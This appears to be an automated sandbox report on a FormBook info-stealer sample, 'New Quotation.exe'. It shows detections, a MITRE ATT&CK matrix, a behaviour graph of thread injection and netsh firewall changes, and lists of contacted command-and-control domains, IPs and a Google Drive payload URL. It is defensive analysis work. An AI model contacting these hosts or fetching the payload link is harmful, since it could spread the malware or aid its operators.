      Source: explorer.exe, 0000000A.00000000.49394023948.0000000001151000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49346306455.0000000001151000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49448060741.0000000001151000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Uses netsh to modify the Windows network and firewall settings
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Disable or Modify Tools      		1
      Credential API Hooking      		2
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium3
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules      		1
      Windows Service      		1
      Access Token Manipulation      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory4
      System Information Discovery      		Remote Desktop Protocol1
      Credential API Hooking      		Exfiltration Over Bluetooth11
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      Windows Service      		3
      Obfuscated Files or Information      		Security Account Manager221
      Security Software Discovery      		SMB/Windows Admin Shares1
      Clipboard Data      		Automated Exfiltration3
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)512
      Process Injection      		1
      Software Packing      		NTDS12
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput CaptureScheduled Transfer114
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets2
      Process Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      File Deletion      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Rootkit      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job12
      Virtualization/Sandbox Evasion      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
      Access Token Manipulation      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)512
      Process Injection      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 643108 Sample: New Quotation.exe Startdate: 10/06/2022 Architecture: WINDOWS Score: 100 38 www.tuinkunst.online 2->38 40 www.soussecloud.com 2->40 42 29 other IPs or domains 2->42 62 Snort IDS alert for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 7 other signatures 2->68 11 New Quotation.exe 2 21 2->11         started        signatures3 process4 file5 36 C:\Users\user\AppData\Local\...\System.dll, PE32 11->36 dropped 80 Tries to detect Any.run 11->80 15 New Quotation.exe 6 11->15         started        signatures6 process7 dnsIp8 50 drive.google.com 142.250.186.110, 443, 49764 GOOGLEUS United States 15->50 52 googlehosted.l.googleusercontent.com 172.217.19.65, 443, 49765 GOOGLEUS United States 15->52 54 Modifies the context of a thread in another process (thread injection) 15->54 56 Tries to detect Any.run 15->56 58 Maps a DLL or memory area into another process 15->58 60 2 other signatures 15->60 19 explorer.exe 15->19 injected signatures9 process10 dnsIp11 44 puude.online 93.89.226.17, 49785, 80 TR-FBSTR Turkey 19->44 46 bkbc.site 185.45.67.192, 49782, 80 SUPERHOSTING_ASBG Bulgaria 19->46 48 16 other IPs or domains 19->48 70 System process connects to network (likely due to code injection or exploit) 19->70 72 Uses netsh to modify the Windows network and firewall settings 19->72 23 netsh.exe 19->23         started        26 autoconv.exe 19->26         started        28 autochk.exe 19->28         started        30 autofmt.exe 19->30         started        signatures12 process13 signatures14 74 Self deletion via cmd or bat file 23->74 76 Modifies the context of a thread in another process (thread injection) 23->76 78 Maps a DLL or memory area into another process 23->78 32 cmd.exe 1 23->32         started        process15 process16 34 conhost.exe 32->34         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      New Quotation.exe10%VirustotalBrowse
      New Quotation.exe0%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll3%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      17.2.netsh.exe.36ef840.4.unpack100%AviraTR/Patched.Ren.GenDownload File
      17.2.netsh.exe.9e5988.0.unpack100%AviraTR/Patched.Ren.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      www.outletgals.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.rlxijvrd.com/a2c8/?6lbL=qTfTz0&Djf=cnYzLO/iOmLQ80nbybEBKd6xv0BZ3jX95SMYu5eAQoFQzMXmCHJOFJgiGACm/n2x6SPU0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-includes/js/wp-embed.min.js?ver=5.1.130%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.10%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/custom.js?ver=5.1.130%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://schemas.micro0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.10%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://www.cocodetteexciple.com/a2c8/?Djf=hAb1bfA3kdRzRDaFO/Xjxrg/eigTyfVAv6myO+nVVHigx1EEc3JcIrberUsYxkjlMdL+&6lbL=qTfTz00%Avira URL Cloudsafe
      https://powerpoint.office.comEM0%Avira URL Cloudsafe
      www.lcm-brokers.com/a2c8/0%Avira URL Cloudsafe
      https://excel.office.comf_l=0%Avira URL Cloudsafe
      http://www.lax0.com/a2c8/?Djf=iEw+cJwvtv+bQOCPj3F7KZu21Rs9fexzItYbFNxodrXSDd9r0rFLMIC1b94eFbixOM9K&YPcp=8p-DO0%Avira URL Cloudsafe
      http://schemas.microso0%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.10%Avira URL Cloudsafe
      http://subca.ocsp-certum.com050%Avira URL Cloudsafe
      http://subca.ocsp-certum.com020%Avira URL Cloudsafe
      http://subca.ocsp-certum.com010%Avira URL Cloudsafe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      http://lcm-brokers.com0%Avira URL Cloudsafe
      https://parking.bodiscdn.com0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.130%Avira URL Cloudsafe
      http://www.soussecloud.com/a2c8/?6lbL=qTfTz0&Djf=Le51HqdCnUjRonUOENSF5PHY57eFe7/AO9vFjh8TXkRU4Y1PyjhZUj1LAkJkXoaSSV0M0%Avira URL Cloudsafe
      http://lcm-brokers.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
      http://www.tuinkunst.online/a2c8/?Djf=AplE9LD72/xgVAg7E91FKL+rPo1U0v89Attzn1Fzu6gMFI5vxyD2OErKmqoT1DuyJNiH&YPcp=8p-DO0%Avira URL Cloudsafe
      http://www.puude.online/a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz00%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/SmoothScroll.js?ver=5.1.130%Avira URL Cloudsafe
      http://www.bkbc.site/a2c8/?Djf=XJueD6+RsCamebg+m2IDevgDgX6JK6+fg1om2YuoQAjiRITTUmGQ1TK81l5L26OUxDMt&6lbL=qTfTz00%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/bootstrap.js?ver=5.1.130%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-json/0%Avira URL Cloudsafe
      http://lcm-brokers.com/0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/custom.css?ver=5.1.130%Avira URL Cloudsafe
      http://www.lcm-brokers.com/a2c8/?Djf=ZOJEaTbg68I2C/h4CsFFsOVO6bUFraiXKSxh6HANJbUJoISOJ9GPYTEDhfBXlhmSduAT&6lbL=qTfTz00%Avira URL Cloudsafe
      http://www.solaksa.net/a2c8/?6lbL=qTfTz0&Djf=MpN0czAuQ6QXUx2sg2pWHBUGWBvsIkeMjItV5tnwLHMMLUdJVGF+gg01BF91m3Q+VFle0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/ie.css?ver=5.1.130%Avira URL Cloudsafe
      http://www.outletgals.com/a2c8/?6lbL=qTfTz0&Djf=idqIzuqk2a5vjoGSbf9Bcwe0DWiZK+YeMoSyFHNnMaplLV0sCAEI7n55HlOgc8kmWb4X0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
      https://outlook.combwe0%Avira URL Cloudsafe
      http://www.belajarakuntansipajak.com/a2c8/?6lbL=qTfTz0&Djf=C4QtL123UqrFY0ZIvsissWy0gTwQZvavuGdAMd62WneJYeLezb4bPLeN5mqTMt96tJ/I0%Avira URL Cloudsafe
      http://www.onlinesinavsistemi.xyz/a2c8/?Djf=j/Ps+a/VuX4QoBvcMreOK2UI1STzAixbxZBALrwc64bjPCb9njwh7+nFlquJ6zY9vl55&6lbL=qTfTz00%Avira URL Cloudsafe
      http://www.somosnuecru.com/a2c8/?Djf=8QcX/9a8ci5Vn1nUgpALxBO0i5LJh4pOXEYLQ5+l8i6jeOxjgCEcajHz4AJyUtveARY+&6lbL=qTfTz00%Avira URL Cloudsafe
      http://www.cardviews.net/a2c8/?6lbL=qTfTz0&Djf=blgq+MwijlPLtn18EK/mFFgLQ7saUAegRg4nsKXdDvXqvzc0FmI2dz5pRjRE3XI8Zh+s0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/themes/advance-portfolio/style.css?ver=5.1.130%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
      http://www.hanju2020.com/a2c8/?Djf=WTCZorkujDQqRjcxlgclBW8LL1l4Q4yZC6MlAjn7yJTWeUkxqEHcvOf8DmefZeR6VxbM&6lbL=qTfTz00%Avira URL Cloudsafe
      http://www.animehub.store/a2c8/?6lbL=qTfTz0&Djf=9EsqhgYJ7gNCuyDVUAbmGxK1wm9jM9gbBQ+iilDrWSOhprOSHc5xNSdxhhACbSLapwdF0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/bootstrap.css?ver=5.1.130%Avira URL Cloudsafe
      http://lcm-brokers.com/category/%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/uploads/2019/02/1694284689_cb68647c-011d-4340-a998-8a154d3b42dc.pn0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/fontawesome-all.css?ver=5.1.130%Avira URL Cloudsafe
      http://lcm-brokers.com/%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%95%e0%b8%b4%e0%b8%94%e0%b8%95%e0%b9%88%e0%b0%Avira URL Cloudsafe
      https://word.office.comTo0%Avira URL Cloudsafe
      http://lcm-brokers.com/wp-includes/js/jquery/jquery.js?ver=1.12.40%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.cardviews.net
      		99.83.175.80
      		truetrue
        		unknown
        ghs.google.com
        		216.58.212.147
        		truefalse
          		high
          www.ranabroimpexp.com
          		43.225.157.245
          		truetrue
            		unknown
            www.somosnuecru.com
            		82.98.135.44
            		truetrue
              		unknown
              parkingpage.namecheap.com
              		198.54.117.211
              		truefalse
                		high
                www.outletgals.com
                		154.219.125.79
                		truetrueunknown
                bkbc.site
                		185.45.67.192
                		truetrue
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truetrue
                    		unknown
                    22.301url.xyz
                    		116.204.133.148
                    		truetrue
                      		unknown
                      www.rlxijvrd.com
                      		8.214.69.48
                      		truetrue
                        		unknown
                        www.tuinkunst.online
                        		185.104.28.238
                        		truetrue
                          		unknown
                          drive.google.com
                          		142.250.186.110
                          		truefalse
                            		high
                            www.lax0.com
                            		199.59.243.220
                            		truetrue
                              		unknown
                              puude.online
                              		93.89.226.17
                              		truetrue
                                		unknown
                                onlinesinavsistemi.xyz
                                		176.53.69.151
                                		truetrue
                                  		unknown
                                  lcm-brokers.com
                                  		172.105.250.34
                                  		truetrue
                                    		unknown
                                    googlehosted.l.googleusercontent.com
                                    		172.217.19.65
                                    		truefalse
                                      		high
                                      www.soussecloud.com
                                      		46.38.243.234
                                      		truetrue
                                        		unknown
                                        solaksa.net
                                        		152.228.155.71
                                        		truetrue
                                          		unknown
                                          www.hellodamia.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.lcm-brokers.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              doc-14-as-docs.googleusercontent.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                www.belajarakuntansipajak.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.bkbc.site
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.onlinesinavsistemi.xyz
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.cocodetteexciple.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.solaksa.net
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.hanju2020.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.animehub.store
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.puude.online
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                http://www.rlxijvrd.com/a2c8/?6lbL=qTfTz0&Djf=cnYzLO/iOmLQ80nbybEBKd6xv0BZ3jX95SMYu5eAQoFQzMXmCHJOFJgiGACm/n2x6SPUtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.cocodetteexciple.com/a2c8/?Djf=hAb1bfA3kdRzRDaFO/Xjxrg/eigTyfVAv6myO+nVVHigx1EEc3JcIrberUsYxkjlMdL+&6lbL=qTfTz0true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                www.lcm-brokers.com/a2c8/true
                                                                • Avira URL Cloud: safe
                                                                		low
                                                                http://www.lax0.com/a2c8/?Djf=iEw+cJwvtv+bQOCPj3F7KZu21Rs9fexzItYbFNxodrXSDd9r0rFLMIC1b94eFbixOM9K&YPcp=8p-DOtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.soussecloud.com/a2c8/?6lbL=qTfTz0&Djf=Le51HqdCnUjRonUOENSF5PHY57eFe7/AO9vFjh8TXkRU4Y1PyjhZUj1LAkJkXoaSSV0Mtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.tuinkunst.online/a2c8/?Djf=AplE9LD72/xgVAg7E91FKL+rPo1U0v89Attzn1Fzu6gMFI5vxyD2OErKmqoT1DuyJNiH&YPcp=8p-DOtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.puude.online/a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.bkbc.site/a2c8/?Djf=XJueD6+RsCamebg+m2IDevgDgX6JK6+fg1om2YuoQAjiRITTUmGQ1TK81l5L26OUxDMt&6lbL=qTfTz0true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.lcm-brokers.com/a2c8/?Djf=ZOJEaTbg68I2C/h4CsFFsOVO6bUFraiXKSxh6HANJbUJoISOJ9GPYTEDhfBXlhmSduAT&6lbL=qTfTz0true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.solaksa.net/a2c8/?6lbL=qTfTz0&Djf=MpN0czAuQ6QXUx2sg2pWHBUGWBvsIkeMjItV5tnwLHMMLUdJVGF+gg01BF91m3Q+VFletrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.outletgals.com/a2c8/?6lbL=qTfTz0&Djf=idqIzuqk2a5vjoGSbf9Bcwe0DWiZK+YeMoSyFHNnMaplLV0sCAEI7n55HlOgc8kmWb4Xtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.belajarakuntansipajak.com/a2c8/?6lbL=qTfTz0&Djf=C4QtL123UqrFY0ZIvsissWy0gTwQZvavuGdAMd62WneJYeLezb4bPLeN5mqTMt96tJ/Ifalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.onlinesinavsistemi.xyz/a2c8/?Djf=j/Ps+a/VuX4QoBvcMreOK2UI1STzAixbxZBALrwc64bjPCb9njwh7+nFlquJ6zY9vl55&6lbL=qTfTz0true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.somosnuecru.com/a2c8/?Djf=8QcX/9a8ci5Vn1nUgpALxBO0i5LJh4pOXEYLQ5+l8i6jeOxjgCEcajHz4AJyUtveARY+&6lbL=qTfTz0true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.cardviews.net/a2c8/?6lbL=qTfTz0&Djf=blgq+MwijlPLtn18EK/mFFgLQ7saUAegRg4nsKXdDvXqvzc0FmI2dz5pRjRE3XI8Zh+strue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.hanju2020.com/a2c8/?Djf=WTCZorkujDQqRjcxlgclBW8LL1l4Q4yZC6MlAjn7yJTWeUkxqEHcvOf8DmefZeR6VxbM&6lbL=qTfTz0true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.animehub.store/a2c8/?6lbL=qTfTz0&Djf=9EsqhgYJ7gNCuyDVUAbmGxK1wm9jM9gbBQ+iilDrWSOhprOSHc5xNSdxhhACbSLapwdFtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://doc-14-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/do4pmedip159iep2454spmaehd0b8seb/1654840275000/03850461078914778055/*/1pkJqJeYBgsKa6ou6xByI4DdGT3NGirLb?e=downloadfalse
                                                                  		high

                                                                  URLs from Memory and Binaries

                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  http://crl.certum.pl/ctsca2021.crl0onetsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                    		high
                                                                    https://windows.msn.com/shellexplorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://lcm-brokers.com/wp-includes/js/wp-embed.min.js?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://lcm-brokers.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://android.notify.windows.com/iOSPexplorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000A.00000000.49469621943.000000000CC76000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49416561413.000000000CC76000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49365098957.000000000CC76000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49590263815.000000000CC76000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/custom.js?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://drive.google.com/tLNew Quotation.exe, 00000007.00000002.49635663591.0000000001911000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDNew Quotation.exe, 00000007.00000001.49189403103.0000000000626000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                              		high
                                                                              https://api.msn.com/v1/news/Feed/Windows?Q3explorer.exe, 0000000A.00000000.49355474734.0000000009508000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49578967712.0000000009508000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49406430293.0000000009508000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49458681823.0000000009508000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.microexplorer.exe, 0000000A.00000000.49585608138.000000000A7F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49449817529.0000000003000000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49463206909.0000000009C50000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://lcm-brokers.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.gopher.ftp://ftp.New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://powerpoint.office.comEMexplorer.exe, 0000000A.00000000.49459497536.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49579842932.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49356288343.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49407255010.00000000095B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://excel.office.comf_l=explorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp$explorer.exe, 0000000A.00000000.49427367248.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49482863595.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49375457451.0000000010957000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
